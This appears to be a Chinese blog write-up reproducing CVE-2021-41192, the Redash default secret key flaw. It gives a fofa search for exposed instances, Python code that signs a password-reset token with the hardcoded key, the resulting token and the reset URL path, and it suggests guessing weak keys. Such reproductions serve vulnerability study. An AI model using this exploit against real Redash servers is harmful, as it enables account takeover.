Redash 默认key漏洞(CVE-2021-41192)复现

Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。

1.漏洞级别

中危

2.漏洞搜索

fofa

"redash"

3.影响范围

Redash < 10.0.0

4.漏洞复现

漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用户不手动修改的话,我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token,因此我们可以直接生成一个有效的找回链接。
可以执行如下python代码

from itsdangerous import URLSafeTimedSerializer
if __name__ == "__main__":
    serializer = URLSafeTimedSerializer("c292a0a3aa32397cdb050e233733900f")
    key = serializer.dumps("1")
    print(key)
生成的有效负载:
IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18
  • 由于生成的有效负载存在过期时间,因此每次测试的时候最好重新生成一下。
  • "c292a0a3aa32397cdb050e233733900f"为默认key。如果用户手动修改了这个key,我们也可以尝试使用一些弱口令来生成负载尝试一下。
    访问路径
url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18

如果出现即为漏洞存在
在这里插入图片描述
出现这个表示key已被修改过了
在这里插入图片描述
到这里漏洞就复现成功了。
如果有问题欢迎随时沟通~

在这里插入图片描述

  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值